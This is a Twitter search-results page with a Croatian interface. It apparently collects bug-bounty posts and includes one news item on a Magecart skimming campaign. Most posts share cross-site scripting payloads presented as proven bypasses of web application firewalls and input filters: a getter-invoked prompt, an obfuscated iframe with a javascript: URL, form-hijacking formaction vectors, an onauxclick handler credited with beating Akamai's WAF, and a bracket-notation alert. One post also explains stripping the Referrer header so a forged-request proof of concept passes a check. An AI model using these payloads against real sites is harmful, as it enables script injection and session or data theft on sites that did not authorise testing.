Rezultati pretraživanja
  1. prije 15 minuta

    Repost of a payload I posted before without any parenthesis after "prompt"! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF!

  2. prije 2 sata

    A Magecart group has expanded its operations by compromising not only an Olympic ticket reseller but also a number of other websites referencing a single malicious domain hosting the underlying skimmer code.

  3. prije 3 sata

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

  4. prije 7 sati
  5. prije 10 sati
  6. prije 10 sati
  7. 2. velj

    this is just the beginning.

  8. 1. velj

    Form Hijacking <form action=javascript:alert(1)// <form><button formaction=javascript&colon;alert(1)>xss <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <form id="test" /><button form="test" formaction="javascript:alert()">xss

  9. 1. velj

    Found and reported multiple stored vulnerabilities in popular plugin Strong Testimonials (90,000+ active installations). Issue has been fixed in the latest release. Update immediately!

  10. 1. velj

    Xss Bug found with PoC video techsanar web.

  11. 1. velj

    I just got a fancy idea to create strings in without using dangerous characters 😃 Inspired by challenge from .

    Prikaži ovu nit
  12. 31. sij

    Akamai WAF Bypass, worked on a recent program <x onauxclick=a=alert,a(domain)>click

  13. 31. sij

    Neat xss payload required to bypass filters: 1. No periods allowed 2. Regex filter on text followed by '(' Blocking "alert(, confirm(, etc", but the self['alert']( got by the filter Payload: ?t=test'*self['alert'](document['domain'])*'test

  14. 31. sij

    via POST originated from VPS doesn't work because victim checks the value of Referrer Header? Just remove the header from your POC and try again: <meta name="referrer" content="no-referrer" />

  15. 29. sij
  16. 28. sij

    I guess thinks parenthesis is signs of

    Prikaži ovu nit
  17. 27. sij
  18. 27. sij

    Hey guys I'm pretty unexperienced in so is there any attributes that are nice to know? Something like onclick or onerror but without interaction and without causing an error?

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.